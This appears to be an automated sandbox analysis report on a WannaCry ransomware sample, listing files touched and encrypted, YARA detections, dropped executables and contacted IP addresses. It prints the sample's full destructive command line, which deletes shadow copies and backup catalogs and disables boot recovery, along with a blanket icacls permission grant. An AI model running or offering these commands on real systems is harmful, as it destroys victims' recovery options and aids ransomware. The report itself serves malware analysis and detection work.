file: C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\~SD2746.tmp
file: C:\Users\user\AppData\Roaming\Identities\~SD27A5.tmp
file: C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\~SD2804.tmp
file: C:\Users\user\AppData\Roaming\Media Center Programs\~SD2834.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\~SD2844.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\AddIns\~SD2855.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\~SD2866.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\~SD2876.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Credentials\~SD2887.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Crypto\~SD28A7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\~SD28C7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD28E8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\~SD2908.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\~SD2909.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\~SD2929.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Excel\~SD2949.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\~SD2979.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\~SD29A9.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SD29BA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\~SD29EA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\~SD29FA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\~SD2A2A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\~SD2A5A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\~SD2A7A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\MMC\~SD2AAA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Office\~SD2ADA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\~SD2B0A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Proof\~SD2B3A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Protect\~SD2B79.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD2BC8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Speech\~SD2C08.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\~SD2C38.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\~SD2C68.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\~SD2C88.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\~SD2CD7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\~SD2CE8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\~SD2D17.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\~SD2D47.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\~SD2D96.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\~SD2DA7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\~SD2DD7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\~SD2E93.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\~SD2EA4.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\~SD2EC4.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\~SD2EE5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\~SD2EF5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\~SD2EF6.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\UProof\~SD2EF7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Vault\~SD2EF8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\~SD2EF9.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\~SD2F0C.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\~SD2F0D.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\~SD2F0E.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\~SD2F0F.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\~SD2F10.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\~SD2F20.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\~SD2F21.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\~SD2F22.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SD2F52.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SD2F63.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\~SD2F83.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\~SD2F94.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\~SD2FA4.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\~SD2FB5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\~SD2FF5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\~SD3044.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\~SD3093.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD30C3.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3102.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3132.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3162.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3182.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD31A2.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\~SD31D3.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\~SD3203.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\~SD3233.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\~SD32C1.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Word\~SD331F.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\~SD3330.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\~SD337F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Extensions\~SD33AF.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\~SD33DF.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\~SD340F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\~SD341F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\~SD3420.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\~SD3431.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD3432.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\~SD3443.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\~SD3444.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\~SD3445.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\~SD3446.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\~SD3447.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\~SD3457.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\~SD3458.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\~SD3459.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\~SD345A.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\~SD345B.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\~SD347C.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\~SD348C.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\~SD348D.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\~SD348E.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\~SD348F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\~SD34A0.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\~SD34A1.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\~SD34A2.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\~SD34A3.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\~SD34A4.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\~SD34A5.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\~SD3532.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\~SD35A1.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\~SD35D1.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\~SD3610.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\~SD3650.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\~SD369F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\~SD371D.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\~SD378B.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\~SD37BB.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\~SD37EB.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD380B.tmp
file: C:\Users\user\AppData\Roaming\Skype\~SD385A.tmp
file: C:\Users\user\AppData\Roaming\Skype\RootTools\~SD388A.tmp
file: C:\Users\user\AppData\Roaming\Sun\~SD38AA.tmp
file: C:\Users\user\AppData\Roaming\Sun\Java\~SD38BB.tmp
file: C:\Users\user\AppData\Roaming\Sun\Java\Deployment\~SD38DB.tmp
file: C:\Users\user\Contacts\~SD38EC.tmp
file: C:\Users\user\Desktop\~SD38ED.tmp
file: C:\Users\user\Documents\~SD38FE.tmp
file: C:\Users\user\Documents\WindowsPowerShell\~SD391E.tmp
file: C:\Users\user\Downloads\~SD393E.tmp
file: C:\Users\user\Favorites\~SD396E.tmp
file: C:\Users\user\Favorites\Links for United States\~SD39BE.tmp
file: C:\Users\user\Links\~SD39DE.tmp
file: C:\Users\user\Music\~SD3A0E.tmp
file: C:\Users\user\OneDrive\~SD3A2E.tmp
file: C:\Users\user\Pictures\~SD3A4F.tmp
file: C:\Users\user\Saved Games\~SD3A6F.tmp
file: C:\Users\user\Searches\~SD3AAE.tmp
file: C:\Users\user\Videos\~SD3AFE.tmp
file: C:\vlmcsd\~SD3B2D.tmp
file: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
Yara detections observed in process dumps, payloads or dropped files
Hit: PID triggered the Yara rule 'INDICATOR_SUSPICIOUS_GENRansomware' with data '['delete shadows /all', '} recoveryenabled no', '} bootstatuspolicy ignoreallfailures', 'wmic shadowcopy delete', 'delete catalog -quiet']'
Hit: PID 3040 triggered the Yara rule 'WanaCry' with data '['@WanaDecryptor@.exe', '%08X.res', '%08X.pky', '%08X.eky', '{ 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53 }']'
Attempts to identify installed AV products by installation directory
file: C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
file: C:\Users\All Users\Microsoft\Microsoft Security Client\*
file: C:\Users\All Users\Microsoft\Microsoft Security Client\Support\*
file: C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
file: C:\Users\All Users\Microsoft\Microsoft Security Client
file: C:\Users\All Users\Microsoft\Microsoft Security Client\Support
Attempts to delete or modify volume shadow copies
Attempts to delete system state backup
Drops a binary and executes it
binary: C:\Users\user\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
binary: C:\Users\user\AppData\Local\Temp\taskdl.exe
binary: C:\Users\user\AppData\Local\Temp\taskse.exe
Attempts to modify desktop wallpaper
Creates a known WannaCry ransomware decryption instruction / key file.
Collects information on the system (ipconfig, netstat, systeminfo)
Clears web history
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
Uses suspicious command line tools or Windows utilities
command: icacls . /grant Everyone:F /T /C /Q
command: icacls . /grant Everyone:F /T /C /Q
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
command: vssadmin delete shadows /all /quiet
Multiple files with the same extensions were modified, indicating ransomware behaviour
File Extension: wnry: 35
File Extension: WNCRYT: 1090
File Extension: WNCRY: 544
File Extension: lnk: 29
File Extension: bmp: 5
File Extension: db: 6

Screenshots

No playback available.

Hosts

Direct IP Country Name ASN
Y 37.187.102.186 [VT] unknown
Y 128.31.0.39 [VT] unknown
Y 163.172.35.247 [VT] unknown
Y 146.185.177.103 [VT] unknown
Y 193.23.244.244 [VT] unknown
Y 212.47.229.2 [VT] unknown

DNS

No domains contacted.

Summary

C:\Users\user\AppData\Local\Temp\
C:\Users\user\AppData\Local\Temp\b.wnry
C:\Users\user\AppData\Local\Temp\c.wnry
C:\Users\user\AppData\Local\Temp\msg
C:\Users\user\AppData\Local\Temp\msg\
C:\Users\user\AppData\Local\Temp\msg\m_bulgarian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_chinese (simplified).wnry
C:\Users\user\AppData\Local\Temp\msg\m_chinese (traditional).wnry
C:\Users\user\AppData\Local\Temp\msg\m_croatian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_czech.wnry
C:\Users\user\AppData\Local\Temp\msg\m_danish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_dutch.wnry
C:\Users\user\AppData\Local\Temp\msg\m_english.wnry
C:\Users\user\AppData\Local\Temp\msg\m_filipino.wnry
C:\Users\user\AppData\Local\Temp\msg\m_finnish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_french.wnry
C:\Users\user\AppData\Local\Temp\msg\m_german.wnry
C:\Users\user\AppData\Local\Temp\msg\m_greek.wnry
C:\Users\user\AppData\Local\Temp\msg\m_indonesian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_italian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_japanese.wnry
C:\Users\user\AppData\Local\Temp\msg\m_korean.wnry
C:\Users\user\AppData\Local\Temp\msg\m_latvian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_norwegian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_polish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_portuguese.wnry
C:\Users\user\AppData\Local\Temp\msg\m_romanian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_russian.wnry
C:\Users\user\AppData\Local\Temp\msg\m_slovak.wnry
C:\Users\user\AppData\Local\Temp\msg\m_spanish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_swedish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_turkish.wnry
C:\Users\user\AppData\Local\Temp\msg\m_vietnamese.wnry
C:\Users\user\AppData\Local\Temp\r.wnry
C:\Users\user\AppData\Local\Temp\s.wnry
C:\Users\user\AppData\Local\Temp\t.wnry
C:\Users\user\AppData\Local\Temp\taskdl.exe
C:\Users\user\AppData\Local\Temp\taskse.exe
C:\Users\user\AppData\Local\Temp\u.wnry
C:\Users\user\AppData\Local\Temp\00000000.dky
C:\Users\user\AppData\Local\Temp\00000000.pky
C:\Users\user\AppData\Local\Temp\00000000.eky
C:\Users\user\AppData\Local\Temp\00000000.res
C:\Users\user\AppData\Local\Temp\f.wnry
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
C:\Users\user\AppData\Local\Temp\275781765172918.bat
C:\Users\user\AppData\Local\Temp\@Please_Read_Me@.txt
C:\Users\user\Desktop\*
C:\Users\user\Desktop
C:\Users\user\Desktop\~SD7362.tmp
C:\Users\user\Documents\*
C:\Users\user\Documents
C:\Users\user\Documents\~SD73C1.tmp
C:\Users\user\Documents\My Music\*
C:\Users\user\Documents\My Pictures\*
C:\Users\user\Documents\My Videos\*
C:\Users\user\Documents\WindowsPowerShell\*
C:\Users\user\Documents\WindowsPowerShell
C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
C:\Users\*.*
C:\Users\All Users\Desktop\*
C:\Users\Default\Desktop\*
C:\Users\Default\Desktop
C:\Users\Default\Desktop\~SD73F2.tmp
C:\Users\Default User\Desktop\*
C:\Users\Default User\Desktop
C:\Users\Default User\Desktop\~SD7412.tmp
C:\Users\Public\Desktop\*
C:\Users\Public\Desktop
C:\Users\Public\Desktop\~SD7432.tmp
C:\Users\All Users\Documents\*
C:\Users\Default\Documents\*
C:\Users\Default\Documents
C:\Users\Default\Documents\~SD7443.tmp
C:\Users\Default\Documents\My Music\*
C:\Users\Default\Documents\My Pictures\*
C:\Users\Default\Documents\My Videos\*
C:\Users\Default User\Documents\*
C:\Users\Default User\Documents
C:\Users\Default User\Documents\~SD7454.tmp
C:\Users\Default User\Documents\My Music\*
C:\Users\Default User\Documents\My Pictures\*
C:\Users\Default User\Documents\My Videos\*
C:\Users\Public\Documents\*
C:\Users\Public\Documents
C:\Users\Public\Documents\~SD7464.tmp
C:\Users\Public\Documents\My Music\*
C:\Users\Public\Documents\My Pictures\*
C:\Users\Public\Documents\My Videos\*
C:\*
C:\Users\user\AppData\Local\Temp
C:\~SD7475.tmp
C:\@Please_Read_Me@.txt
C:\@WanaDecryptor@.exe
C:\$Recycle.Bin\*
C:\$Recycle.Bin
C:\$Recycle.Bin\~SD7486.tmp
C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\*
C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500
C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\*
C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000
C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\*
C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500
C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
C:\ba69bdf0a250e352360c33\*
C:\ba69bdf0a250e352360c33
C:\ba69bdf0a250e352360c33\~SD74E7.tmp
C:\ba69bdf0a250e352360c33\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1025\*
C:\ba69bdf0a250e352360c33\1025
C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1025\eula.rtf
C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1025\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1025\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1028\*
C:\ba69bdf0a250e352360c33\1028
C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1028\eula.rtf
C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1028\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1028\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1029\*
C:\ba69bdf0a250e352360c33\1029
C:\ba69bdf0a250e352360c33\1029\~SD7596.tmp
C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1029\eula.rtf
C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1029\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1029\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1030\*
C:\ba69bdf0a250e352360c33\1030
C:\ba69bdf0a250e352360c33\1030\~SD75B6.tmp
C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1030\eula.rtf
C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1030\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1030\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1031\*
C:\ba69bdf0a250e352360c33\1031
C:\ba69bdf0a250e352360c33\1031\~SD75E6.tmp
C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1031\eula.rtf
C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1031\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1031\@WanaDecryptor@.exe
C:\ba69bdf0a250e352360c33\1032\*
C:\ba69bdf0a250e352360c33\1032
C:\ba69bdf0a250e352360c33\1032\~SD7616.tmp
C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRY
C:\ba69bdf0a250e352360c33\1032\eula.rtf
C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1032\@Please_Read_Me@.txt
C:\ba69bdf0a250e352360c33\1032\@WanaDecryptor@.exe
